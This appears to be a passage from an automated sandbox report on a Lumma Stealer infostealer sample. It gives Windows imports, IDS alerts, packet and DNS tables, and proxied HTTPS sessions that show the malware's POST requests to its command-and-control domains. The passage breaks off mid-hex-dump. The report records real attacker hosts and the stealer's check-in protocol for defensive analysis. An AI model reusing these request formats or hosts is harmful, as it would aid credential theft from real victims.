SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:37:26.679777+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49976	188.114.96.3	443	TCP
2025-01-10T23:37:27.201309+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49976	188.114.96.3	443	TCP
2025-01-10T23:37:27.201309+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49976	188.114.96.3	443	TCP
2025-01-10T23:37:27.698225+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49983	188.114.96.3	443	TCP
2025-01-10T23:37:28.174177+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49983	188.114.96.3	443	TCP
2025-01-10T23:37:28.174177+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49983	188.114.96.3	443	TCP
2025-01-10T23:37:28.810481+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49986	188.114.96.3	443	TCP
2025-01-10T23:37:29.778779+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49986	188.114.96.3	443	TCP
2025-01-10T23:37:30.381732+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49987	188.114.96.3	443	TCP
2025-01-10T23:37:31.617714+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49988	188.114.96.3	443	TCP
2025-01-10T23:37:32.917014+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49989	188.114.96.3	443	TCP
2025-01-10T23:37:33.916452+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49990	188.114.96.3	443	TCP
2025-01-10T23:37:34.927588+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49992	188.114.96.3	443	TCP
2025-01-10T23:37:36.429697+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49992	188.114.96.3	443	TCP
2025-01-10T23:37:37.251798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49993	185.161.251.21	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:37:26.187179089 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.187242985 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:26.187319040 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.218446970 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.218485117 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:26.679681063 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:26.679776907 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.681335926 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.681345940 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:26.681576967 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:26.731132984 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.772411108 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.772444010 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:26.772548914 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.201328039 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.201431990 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.201488018 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.216010094 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.216047049 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.216062069 CET	49976	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.216068029 CET	443	49976	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.229280949 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.229317904 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.229376078 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.229648113 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.229660988 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.698118925 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.698225021 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.700203896 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.700218916 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.700459957 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:27.702532053 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.702562094 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:27.702595949 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.174194098 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.174242020 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.174269915 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.174300909 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.174329996 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.174376011 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.174376011 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.174396038 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.174516916 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.175003052 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.175031900 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.175046921 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.175046921 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.175052881 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.175343990 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.179028034 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.179088116 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.179171085 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.179224014 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.179224014 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.179816008 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.179816008 CET	49983	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.179828882 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.179836988 CET	443	49983	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.352845907 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.352900982 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.352994919 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.353281021 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.353296041 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.810316086 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.810481071 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.811778069 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.811793089 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.812119007 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:28.813918114 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.814050913 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:28.814069986 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:29.778794050 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:29.778902054 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:29.779143095 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:29.779268980 CET	49986	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:29.779288054 CET	443	49986	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:29.896317005 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:29.896364927 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:29.896434069 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:29.896764040 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:29.896776915 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.381656885 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.381731987 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:30.383225918 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:30.383239031 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.383567095 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.384856939 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:30.384982109 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:30.385014057 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.385252953 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:30.427340031 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.874164104 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.874260902 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:30.874516010 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:30.874516010 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.131329060 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.131390095 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:31.131479025 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.131798029 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.131808996 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:31.184967041 CET	49987	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.184987068 CET	443	49987	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:31.617461920 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:31.617713928 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.618892908 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.618905067 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:31.619362116 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:31.623137951 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.623913050 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.623951912 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:31.624162912 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:31.624171972 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.252146006 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.252239943 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.252309084 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.252434015 CET	49988	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.252460957 CET	443	49988	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.453063011 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.453125954 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.453190088 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.453881979 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.453893900 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.916909933 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.917013884 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.918308973 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.918318033 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.918600082 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:32.919742107 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.919811010 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:32.919820070 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.383642912 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.383910894 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.383977890 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.384076118 CET	49989	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.384097099 CET	443	49989	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.447935104 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.447995901 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.448259115 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.448553085 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.448566914 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.916374922 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.916451931 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.917862892 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.917874098 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.918102980 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:33.919517040 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.919626951 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:33.919631004 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.439899921 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.439996958 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.440052986 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.440213919 CET	49990	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.440232038 CET	443	49990	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.443285942 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.443342924 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.443496943 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.443883896 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.443897009 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.927498102 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.927587986 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.929100990 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.929112911 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.929411888 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:34.930764914 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.930790901 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:34.930844069 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:36.429703951 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:36.429842949 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:36.429936886 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:36.430121899 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:36.430145025 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:36.430156946 CET	49992	443	192.168.2.6	188.114.96.3
Jan 10, 2025 23:37:36.430165052 CET	443	49992	188.114.96.3	192.168.2.6
Jan 10, 2025 23:37:36.491729021 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:36.491784096 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:36.491875887 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:36.492270947 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:36.492291927 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.251741886 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.251797915 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:37.253654003 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:37.253671885 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.254126072 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.255243063 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:37.295336962 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.510241985 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.510322094 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.510387897 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:37.510545015 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:37.510562897 CET	443	49993	185.161.251.21	192.168.2.6
Jan 10, 2025 23:37:37.510591984 CET	49993	443	192.168.2.6	185.161.251.21
Jan 10, 2025 23:37:37.510600090 CET	443	49993	185.161.251.21	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:36:46.740741014 CET	65198	53	192.168.2.6	1.1.1.1
Jan 10, 2025 23:36:46.749258041 CET	53	65198	1.1.1.1	192.168.2.6
Jan 10, 2025 23:37:26.168687105 CET	54768	53	192.168.2.6	1.1.1.1
Jan 10, 2025 23:37:26.178875923 CET	53	54768	1.1.1.1	192.168.2.6
Jan 10, 2025 23:37:36.433095932 CET	51898	53	192.168.2.6	1.1.1.1
Jan 10, 2025 23:37:36.490932941 CET	53	51898	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 23:36:46.740741014 CET	192.168.2.6	1.1.1.1	0xfa8a	Standard query (0)	EkmHushSfm.EkmHushSfm	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:37:26.168687105 CET	192.168.2.6	1.1.1.1	0xf2e3	Standard query (0)	enthuasticsa.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:37:36.433095932 CET	192.168.2.6	1.1.1.1	0x76c9	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 23:36:46.749258041 CET	1.1.1.1	192.168.2.6	0xfa8a	Name error (3)	EkmHushSfm.EkmHushSfm	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:37:26.178875923 CET	1.1.1.1	192.168.2.6	0xf2e3	No error (0)	enthuasticsa.cyou		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:37:26.178875923 CET	1.1.1.1	192.168.2.6	0xf2e3	No error (0)	enthuasticsa.cyou		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 23:37:36.490932941 CET	1.1.1.1	192.168.2.6	0x76c9	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

enthuasticsa.cyou

cegu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49976	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:26 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: enthuasticsa.cyou
2025-01-10 22:37:26 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-10 22:37:27 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7s3g7n88t205dg4fjt03s3v2j2; expires=Tue, 06 May 2025 16:24:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IHx6Nb0sEKaZ0kMPlv7pR0qQlOD1B7%2BYF63vSbJxlsGzLOJaL0DufX5n%2FRadGz15Z2MUyfm3Wlb1Mi2Wu9j9DtU9of4qeOZ2P08dah6VPZQRe1CnqKtjEAohea9%2FGchVvKmihQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900026d2aad5c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1457&min_rtt=1453&rtt_var=553&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1962365&cwnd=178&unsent_bytes=0&cid=4a6721ee935ba743&ts=534&x=0"
2025-01-10 22:37:27 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-10 22:37:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49983	188.114.96.3	443	3792	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:37:27 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: enthuasticsa.cyou
2025-01-10 22:37:27 UTC	77	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d
2025-01-10 22:37:28 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:37:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qkvkuamqgn7o3tm8f63bea9lq1; expires=Tue, 06 May 2025 16:24:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8Jr0ViGCATZ3Rto5Z4jFfY84xeGHdaV7YE4h8tDzD66Kn2QkeQ8ttYeiJtTe44cpRwvbbWIXinQwvYCmK2ZIQXpZGsUScndACC5nXAV0iqD7CvkJUYqMnc%2F%2FyDdo%2BLMyRAOnw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900026d8b8e98c71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2030&min_rtt=2025&rtt_var=770&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=978&delivery_rate=1412675&cwnd=193&unsent_bytes=0&cid=fd18e2311a0d49cc&ts=494&x=0"
2025-01-10 22:37:28 UTC	240	IN	Data Raw: 33 61 38 38 0d 0a 73 4f 78 69 50 57 58 46 2b 48 36 42 66 39 32 63 52 62 47 30 56 7a 58 2f 49 65 6a 61 67 49 31 79 36 6d 32 42 4b 50 76 36 72 43 58 4c 7a 68 51 66 58 2f 48 55 58 50 49 61 2f 36 59 6a 30 4e 67 6b 55 4e 4d 44 69 62 36 69 74 78 53 4c 41 66 4a 4e 31 39 6a 61 53 4a 4c 57 42 46 77 4a 74 70 31 53 6f 78 71 6c 76 6e 2f 71 7a 33 56 51 6b 51 50 53 2b 4f 58 6e 45 49 73 42 34 30 6d 51 6c 64 78 4a 30 34 51 4f 57 67 32 67 6d 78 72 67 45 37 44 35 49 4e 54 56 50 56 75 57 54 49 43 33 6f 71 46 51 6a 78 65 6a 45 74 6d 33 79 56 48 52 6f 51 4e 4f 44 75 65 46 55 76 70 64 75 50 4a 6e 69 35 59 32 55 4a 31 4e 6a 72 37 72 35 52 71 43 43 65 4a 4d 6b 59 72 46 51 39 69 45 41 46 6b 4d 71 70 49 4f 37 52 6d 33 38 69 62 65 31 58 Data Ascii: 3a88sOxiPWXF+H6Bf92cRbG0VzX/IejagI1y6m2BKPv6rCXLzhQfX/HUXPIa/6Yj0NgkUNMDib6itxSLAfJN19jaSJLWBFwJtp1Soxqlvn/qz3VQkQPS+OXnEIsB40mQldxJ04QOWg2gmxrgE7D5INTVPVuWTIC3oqFQjxejEtm3yVHRoQNODueFUvpduPJni5Y2UJ1Njr7r5RqCCeJMkYrFQ9iEAFkMqpIO7Rm38ibe1X
2025-01-10 22:37:28 UTC	1369	IN	Data Raw: 55 5a 33 55 53 53 2b 4c 71 76 51 37 6f 4d 38 6c 75 4d 6c 64 35 42 6b 70 46 4f 52 6b 65 67 6c 6c 79 37 58 62 66 79 4b 64 62 56 4f 6c 43 63 51 35 69 33 34 75 77 59 67 41 76 70 52 5a 61 58 77 45 33 56 68 67 6c 59 43 4b 43 53 47 75 77 65 2f 37 42 6e 31 4d 35 31 44 39 31 6a 6d 72 76 68 2b 78 32 5a 54 2f 77 45 67 4e 6a 4a 53 35 4c 57 51 46 6b 4a 70 70 63 63 38 52 57 30 39 53 4c 42 33 54 78 61 6b 45 4f 48 73 75 33 73 45 49 38 46 36 55 57 54 6e 4d 4e 4b 31 49 34 41 48 30 6e 6e 6e 51 53 6a 52 66 2f 64 49 73 50 52 4f 55 48 66 65 63 71 6e 72 50 5a 51 6a 77 4f 6a 45 74 6d 51 79 30 54 52 68 51 39 63 44 36 79 49 48 50 45 62 73 76 73 31 31 64 4d 37 58 5a 35 52 67 4c 62 6b 37 42 6d 44 42 75 5a 4e 6e 64 69 41 42 39 57 57 51 41 64 48 68 70 63 58 37 78 65 6f 2f 6d 